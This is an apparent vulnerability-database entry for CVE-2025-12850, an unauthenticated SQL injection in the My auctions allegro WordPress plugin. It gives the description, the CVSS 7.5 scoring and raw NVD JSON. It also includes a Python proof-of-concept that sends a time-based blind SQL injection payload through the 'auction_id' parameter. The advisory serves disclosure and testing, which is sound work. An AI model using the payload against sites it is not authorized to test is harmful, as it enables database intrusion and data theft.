Security Vulnerability Report
中文
CVE-2025-12850 CVSS 7.5 HIGH

CVE-2025-12850

Published: 2025-12-05 07:16:11
Last Modified: 2026-04-15 00:35:42

Description

The My auctions allegro plugin for WordPress is vulnerable to SQL Injection via the ‘auction_id’ parameter in all versions up to, and including, 3.6.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

My auctions allegro plugin for WordPress <= 3.6.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12850 SQL Injection PoC # Target: WordPress My auctions allegro plugin <= 3.6.32 # Vulnerability: SQL Injection via auction_id parameter def test_sqli(url, payload): """Test for SQL injection vulnerability""" params = { 'auction_id': payload } try: response = requests.get(url, params=params, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def main(): if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/wp-admin/admin-ajax.php") sys.exit(1) target_url = sys.argv[1] # Basic time-based blind SQL injection test # This payload causes a 5-second delay if vulnerable time_based_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1" print(f"[*] Testing CVE-2025-12850 SQL Injection...") print(f"[*] Target: {target_url}") print(f"[*] Payload: {time_based_payload}") response = test_sqli(target_url, time_based_payload) if response and response.elapsed.total_seconds() >= 5: print("[+] Target appears to be vulnerable!") else: print("[-] Target may not be vulnerable or not using correct endpoint") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12850", "sourceIdentifier": "[email protected]", "published": "2025-12-05T07:16:11.350", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The My auctions allegro plugin for WordPress is vulnerable to SQL Injection via the ‘auction_id’ parameter in all versions up to, and including, 3.6.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3402268/my-auctions-allegro-free-edition", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc4883b8-5783-49ff-ab3b-c568c9923227?source=cve", "source": "[email protected]"}]}}